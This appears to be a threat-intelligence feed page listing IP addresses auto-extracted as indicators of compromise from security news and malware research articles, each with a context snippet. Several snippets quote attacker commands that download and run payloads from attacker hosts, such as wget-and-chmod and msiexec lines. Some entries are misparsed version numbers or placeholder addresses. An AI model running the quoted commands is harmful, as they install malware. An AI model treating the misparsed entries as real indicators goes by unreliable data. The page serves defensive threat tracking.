ZeroHour

Indicators of compromise

186 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
ipv4185.196.220.85riginated from the below IP addresses - 2602:fa59:10:7a1::1 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws
The Hacker News
· 11d ago
ipv4189.4.122.140103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 ThOver 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws
The Hacker News
· 11d ago
ipv4216.126.225.208:fa59:10:7a1::1 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75 167.254.241.119 114.10.17.253 114.10.45.151Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws
The Hacker News
· 11d ago
ipv437.9.33.62189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 The malicious activity is said to have begun on July 14, 20Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws
The Hacker News
· 11d ago
ipv464.176.209.104178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 The malicious activity is said tOver 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws
The Hacker News
· 11d ago
ipv4162.55.0.0an Hetzner’s normal announcement of the surrounding block ( 162.55.0.0/16 ), so under standard BGP route selection it took precedeSecurity Incident – BGP Hijacking
Lobsters · security
· 12d ago
ipv4162.55.80.0TC , a block of IP addresses used by Softaculous services ( 162.55.80.0/24 , part of our infrastructure at Hetzner) was affected bySecurity Incident – BGP Hijacking
Lobsters · security
· 12d ago
ipv43.2.9.9anches. The incident advisory names the release Virtualizor 3.2.9.9 , while the release note calls it Virtualizor 3.2.9 (ReleasBGP Hijack Delivers Malicious Virtualizor Update That Establishes Persistent Root Access
The Hacker News
· 13d ago
ipv4176.65.148.184include specific log entries and the attackers’ IP address (176.65.148.184). “Given the quick succession of exploit attempts across muExploitation of Sangoma Switchvox flaw is underway (CVE-2026-9586)
Help Net Security
· 13d ago
ipv4185.254.222.105ceived: from relatorio01a.colombstracciatella.cfd (unknown [185.254.222.105]) [information removed] ; Wed, 26 Aug 2026 22:01:41 +0000 (Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 14d ago
ipv4176.65.148.184pts originating from: Indicator Type Description IP Address 176.65.148.184 was observed targeting the vulnerable Switchvox /pa endpoinCVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability
Horizon3.ai
· 14d ago
ipv48.2.2.1release notes describe CVE-2026-9586 as affecting Switchvox 8.2.2.1, while the CNA record specifies 8.3 (104997). OrganizationsCVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability
Horizon3.ai
· 14d ago
ipv48.4.0.2goma Switchvox SMB Edition 8.3 (104997), versions less than 8.4.0.2 The available public sources contain some inconsistency regCVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability
Horizon3.ai
· 14d ago
ipv4132.223.202.213like Gecko ) Chrome / 51.0.2704.103 Safari / 537.36 Host : 132.223.202.213 Scan #3: CVE-2019-2725 - WebLogic versions 10.3.6.0 and 12.Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 27d ago
ipv4159.89.156.190DE . 1 2 3 4 5 6 7 8 9 10 11 wget - O / tmp / pty1 http : //159.89.156.190/.y/pty1; chmod +x / tmp / pty1 ; chmod 700 / tmp / pty1 ; /Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 27d ago
ipv4165.227.78.159> < / void > < void index = '2' > < string > wget http : //165.227.78.159/wl.php</string> </void> </array> <void method = 'start' / >Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 27d ago
ipv4194.187.209.4like Gecko ) Chrome / 51.0.2704.103 Safari / 537.36 Host : 194.187.209.4 Content - Type : text / xml content - length : 916 < soapenMuhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 27d ago
ipv4199.247.6.253ct ( ^ "Wscript.Shell^" ) : v . Run ^ "msiexec /q /i http://199.247.6.253/ud^" , false , 0 < nul > C : \ Windows \ System32 \ spool \RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· 29d ago
ipv489.46.222.9790fe195a2ef109d855 Loader C2 facebook-apps.com (resolves to 89.46.222.97) c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca47RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· 29d ago
ipv4119.104.111.97C2 server answers these two queries with the IPv4 addresses 119.104.111.97 and 109.105.0.0 , which CASHY200 processes by treating eachxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· 29d ago
ipv41.2.3.4ure 4 shows the DNS server responding to these queries with 1.2.3.4 , which is just a placeholder we included in our C2 serverxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· 29d ago
ipv446.166.165.254nloader which is used to call out to a server with the IP ' 46.166.165.254 ' and download the main Rover malware along with plugins usNew Malware 'Rover' Targets Indian Ambassador to Afghanistan
Palo Alto Unit 42
· 29d ago
ipv4111.111.111.111ping.exe" ) and action_process_image_command_line contains "111.111.111.111 -n 5 -w 10" | fields _time , agent_hostname , actor_effectiThreat Brief: Ongoing Russia and Ukraine Cyber Activity
Palo Alto Unit 42
· 29d ago
ipv4172.104.31.117iginated from the following IP addresses: IoC Type IoC Ipv4 172.104.31.117 Ipv4 191.37.248.120 Ipv4 84.17.48.94 Ipv4 193.106.191.71 IpThreat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022
Palo Alto Unit 42
· 29d ago
ipv4191.37.248.120llowing IP addresses: IoC Type IoC Ipv4 172.104.31.117 Ipv4 191.37.248.120 Ipv4 84.17.48.94 Ipv4 193.106.191.71 Ipv4 18.216.140.250 IpThreat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022
Palo Alto Unit 42
· 29d ago
ipv484.17.48.94: IoC Type IoC Ipv4 172.104.31.117 Ipv4 191.37.248.120 Ipv4 84.17.48.94 Ipv4 193.106.191.71 Ipv4 18.216.140.250 Ipv4 18.221.234.103Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022
Palo Alto Unit 42
· 29d ago
ipv41.2.3.4-browswer. DNS lookup is redirected and goes to a the wrong 1.2.3.4 ip address. As long as that IP address has a security cert,Hacking Public Wi-Fi DNS to Steal Credentials
Schneier on Security
· 29d ago
ipv48.8.8.8in LA, what should I do – edit my android hosts file to use 8.8.8.8 to get DNS? Aim my browser at the IP address of my hostingHacking Public Wi-Fi DNS to Steal Credentials
Schneier on Security
· 29d ago
ipv4185.159.130.896.173 guntergoner[.]top - 35.163.101.72 guntergoner[.]top - 185.159.130.89 ibm-technoligi[.]top - 35.165.251.24 ibm-technoligi[.]top -"Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware
Palo Alto Unit 42
· 29d ago
ipv435.163.101.72219.161 footarepu[.]top - 35.165.86.173 guntergoner[.]top - 35.163.101.72 guntergoner[.]top - 185.159.130.89 ibm-technoligi[.]top - 3"Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware
Palo Alto Unit 42
· 29d ago
ipv435.165.251.242 guntergoner[.]top - 185.159.130.89 ibm-technoligi[.]top - 35.165.251.24 ibm-technoligi[.]top - 62.109.29.26 polkiuj[.]top - 35.165."Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware
Palo Alto Unit 42
· 29d ago
ipv435.165.251.241.251.24 ibm-technoligi[.]top - 62.109.29.26 polkiuj[.]top - 35.165.251.241 polkiuj[.]top - 46.173.219.161 suzemodels[.]top - 35.163.10"Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware
Palo Alto Unit 42
· 29d ago
ipv435.165.86.173IP address. adibas[.]top - 46.173.219.161 footarepu[.]top - 35.165.86.173 guntergoner[.]top - 35.163.101.72 guntergoner[.]top - 185.1"Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware
Palo Alto Unit 42
· 29d ago
ipv446.173.219.161hows each domain followed by its IP address. adibas[.]top - 46.173.219.161 footarepu[.]top - 35.165.86.173 guntergoner[.]top - 35.163."Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware
Palo Alto Unit 42
· 29d ago
ipv462.109.29.26ibm-technoligi[.]top - 35.165.251.24 ibm-technoligi[.]top - 62.109.29.26 polkiuj[.]top - 35.165.251.241 polkiuj[.]top - 46.173.219.1"Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware
Palo Alto Unit 42
· 29d ago
ipv4149.202.109.205Locky ransomware: 51.254.181.122 51.255.107.8 78.40.108.39 149.202.109.205 Exploits and malware noted: Description: 2016-03-15 NuclearLocky Ransomware Installed Through Nuclear EK
Palo Alto Unit 42
· 29d ago
ipv446.101.8.169Gate domain: sed.poudelkamal.com.np Nuclear EK IP address: 46.101.8.169 Nuclear EK domains: lotos.castrumtelcom.com.br , here.jninmLocky Ransomware Installed Through Nuclear EK
Palo Alto Unit 42
· 29d ago
ipv446.148.20.32r , here.jninmobilaria.com.ar Follow-up malware IP address: 46.148.20.32 Follow-up malware domain: js.cefora.com.ar IP addresses froLocky Ransomware Installed Through Nuclear EK
Palo Alto Unit 42
· 29d ago
ipv451.254.181.122ses from post-infection traffic caused by Locky ransomware: 51.254.181.122 51.255.107.8 78.40.108.39 149.202.109.205 Exploits and malwLocky Ransomware Installed Through Nuclear EK
Palo Alto Unit 42
· 29d ago
ipv451.255.107.8nfection traffic caused by Locky ransomware: 51.254.181.122 51.255.107.8 78.40.108.39 149.202.109.205 Exploits and malware noted: DeLocky Ransomware Installed Through Nuclear EK
Palo Alto Unit 42
· 29d ago
ipv478.40.108.39fic caused by Locky ransomware: 51.254.181.122 51.255.107.8 78.40.108.39 149.202.109.205 Exploits and malware noted: Description: 20Locky Ransomware Installed Through Nuclear EK
Palo Alto Unit 42
· 29d ago
ipv491.195.12.177Date/time range: 2016-03-15 and 2016-03-16 Gate IP address: 91.195.12.177 Gate domain: sed.poudelkamal.com.np Nuclear EK IP address:Locky Ransomware Installed Through Nuclear EK
Palo Alto Unit 42
· 29d ago
ipv4104.129.198.32r their first seen date. 2015-12-29: 85.93.0.32 2016-02-03: 104.129.198.32 2016-02-24: 85.93.0.33 2016-03-16: 85.93.0.34 2016-04-01: 8EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv4194.165.16.2022016-08-17: 85.93.0.13 2016-08-25: 85.93.0.110 2016-08-30: 194.165.16.202 2016-09-01: 194.165.16.203 2016-09-02: 194.165.16.204 2016-EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv4194.165.16.2036-08-25: 85.93.0.110 2016-08-30: 194.165.16.202 2016-09-01: 194.165.16.203 2016-09-02: 194.165.16.204 2016-09-08: 31.184.193.168 2016-EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv4194.165.16.2048-30: 194.165.16.202 2016-09-01: 194.165.16.203 2016-09-02: 194.165.16.204 2016-09-08: 31.184.193.168 2016-09-14: 31.184.192.188 2016-EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv431.184.192.1889-02: 194.165.16.204 2016-09-08: 31.184.193.168 2016-09-14: 31.184.192.188 2016-09-19: 31.184.193.187EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv431.184.193.1689-01: 194.165.16.203 2016-09-02: 194.165.16.204 2016-09-08: 31.184.193.168 2016-09-14: 31.184.192.188 2016-09-19: 31.184.193.187EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv431.184.193.1879-08: 31.184.193.168 2016-09-14: 31.184.192.188 2016-09-19: 31.184.193.187EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv485.93.0.1103 2016-07-18: 85.93.0.12 2016-08-17: 85.93.0.13 2016-08-25: 85.93.0.110 2016-08-30: 194.165.16.202 2016-09-01: 194.165.16.203 2016-EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv485.93.0.121 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 85.93.0.13 2016-08-25: 85.93.0.110 2016-08-30:EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv485.93.0.132 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 85.93.0.13 2016-08-25: 85.93.0.110 2016-08-30: 194.165.16.202 2016-09-EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv485.93.0.32ly reappeared well after their first seen date. 2015-12-29: 85.93.0.32 2016-02-03: 104.129.198.32 2016-02-24: 85.93.0.33 2016-03-1EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv485.93.0.3315-12-29: 85.93.0.32 2016-02-03: 104.129.198.32 2016-02-24: 85.93.0.33 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 8EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv485.93.0.3416-02-03: 104.129.198.32 2016-02-24: 85.93.0.33 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 8EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv485.93.0.438 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 85.93.0.13 2016-08-25: 8EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv485.93.0.682 2016-02-24: 85.93.0.33 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 8EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv485.93.0.724 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 8EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv485.93.0.813 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 8EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· 29d ago
ipv4104.193.252.236hechinhis[.]com 95.211.205.218 port 80 - tedgeroatref[.]com 104.193.252.236 port 80 - rerobloketbo[.]com 162.244.34.11 port 80 - tonthiAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv4104.193.252.241litigators.esteroscreen[.]com Bedep post-infection traffic: 104.193.252.241 port 80 - qrwzoxcjatynejejsz[.]com 95.211.205.228 port 80 -Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv4162.244.34.11eroatref[.]com 104.193.252.236 port 80 - rerobloketbo[.]com 162.244.34.11 port 80 - tonthishessici[.]com 207.182.148.92 port 80 - allAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv4185.118.164.42the Afraidgate campaign are shown below. Figure 3: Gate on 185.118.164.42 leads to Angler EK/Bedep/CryptXXX on Friday 2016-04-22. FigAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv4192.169.189.167]org 85.25.160.124 port 80 - mcimaildmz.dinnerplate.co[.]uk 192.169.189.167 port 80 - candidulumbestuurlijk.newlandsierrarealestate[.]cAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv4192.169.190.97rt 80 - candidulumbestuurlijk.newlandsierrarealestate[.]com 192.169.190.97 port 80 - frageboegen-plletyksin.breastcanceroutreach[.]comAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv4207.182.148.92bloketbo[.]com 162.244.34.11 port 80 - tonthishessici[.]com 207.182.148.92 port 80 - allofuslikesforums[.]com 85.25.79.211 port 80 - oAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv4209.126.120.8.97 port 80 - reikleivn-azarashi.orlandohomesbydevito[.]com 209.126.120.8 port 80 - litigators.esteroscreen[.]com Bedep post-infectioAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv4217.23.6.40mjobrkn3[.]eu (using a VM) CryptXXX post-infection traffic: 217.23.6.40 port 443 (custom encoding)Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv45.199.141.203yfczmludodohkdqnij[.]com (using a VM) Click-fraud traffic: 5.199.141.203 port 80 - ranetardinghap[.]com 93.190.141.27 port 80 - cetiAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv485.25.160.124et.jacquieleebrasil.com[.]br - GET /js/script.js Angler EK: 85.25.160.124 port 80 - bintiye.helpthevets[.]org 85.25.160.124 port 80 -Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv485.25.79.211ici[.]com 207.182.148.92 port 80 - allofuslikesforums[.]com 85.25.79.211 port 80 - oqpwldjc.mjobrkn3[.]eu (using a VM) CryptXXX postAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv493.190.141.27fraud traffic: 5.199.141.203 port 80 - ranetardinghap[.]com 93.190.141.27 port 80 - cetinhechinhis[.]com 95.211.205.218 port 80 - tedAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv495.211.205.218rdinghap[.]com 93.190.141.27 port 80 - cetinhechinhis[.]com 95.211.205.218 port 80 - tedgeroatref[.]com 104.193.252.236 port 80 - reroAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv495.211.205.228traffic: 104.193.252.241 port 80 - qrwzoxcjatynejejsz[.]com 95.211.205.228 port 80 - yfczmludodohkdqnij[.]com (using a VM) Click-fraudAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· 29d ago
ipv4185.117.153.17650.135 port 80 - 185.5.250.135 - POST /upload/_dispatch.php 185.117.153.176 port 80 - 185.117.153.176 - POST /upload/_dispatch.php 185.Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· 29d ago
ipv4185.118.66.83.176 port 80 - 185.117.153.176 - POST /upload/_dispatch.php 185.118.66.83 port 80 - 185.118.66.83 - POST /upload/_dispatch.php DomainAfraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· 29d ago
ipv4185.140.33.76ored[.]top 5.2.72.236 port 80 - yegoxmvzpx.bsuperpink[.]top 185.140.33.76 port 80 - erfxsnvj.mafterred[.]top 185.140.33.76 port 80 -Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· 29d ago
ipv4185.140.33.99rred[.]top 185.140.33.76 port 80 - hxmst.rautumngreen[.]top 185.140.33.99 port 80 - bkhrdfngwg.blueelizabeth[.]top 185.140.33.99 portAfraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· 29d ago
ipv4185.5.250.13554.202 port 80 - 77.222.54.202 - POST /upload/_dispatch.php 185.5.250.135 port 80 - 185.5.250.135 - POST /upload/_dispatch.php 185.11Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· 29d ago
ipv4188.166.38.1251 port 80 - start.puterasyawal[.]com - GET /js/addOnLoad.js 188.166.38.125 port 80 - nepal.laderatutors[.]com - GET /rokmediaqueries.jAfraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· 29d ago
ipv446.101.26.161compromise associated with the Afraidgate campaign: Gates: 46.101.26.161 port 80 - leon.stmaryschooldmt[.]com - GET /scripts/jquery.Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· 29d ago
ipv45.187.0.137.253.173 port 80 - 5.9.253.173 - POST /upload/_dispatch.php 5.187.0.137 port 80 - 5.187.0.137 - POST /upload/_dispatch.php 77.222.5Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· 29d ago
ipv45.2.72.114.yintored[.]top 5.2.72.236 port 80 - bkubf.bsuperpink[.]top 5.2.72.114 port 80 - iynwzttqd.hautumngreen[.]top 5.2.72.236 port 80 -Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· 29d ago
ipv45.2.72.236zine.polatoglumimarlik[.]com - GET /to_top.js Neutrino EK: 5.2.72.236 port 80 - avukytj.oautumnyellow[.]top 5.2.72.236 port 80 -Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· 29d ago
ipv45.9.253.173rklfdprel.blueelizabeth[.]top Locky post-infection traffic: 5.9.253.173 port 80 - 5.9.253.173 - POST /upload/_dispatch.php 5.187.0.Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· 29d ago
ipv477.222.54.20287.0.137 port 80 - 5.187.0.137 - POST /upload/_dispatch.php 77.222.54.202 port 80 - 77.222.54.202 - POST /upload/_dispatch.php 185.5.Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· 29d ago

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.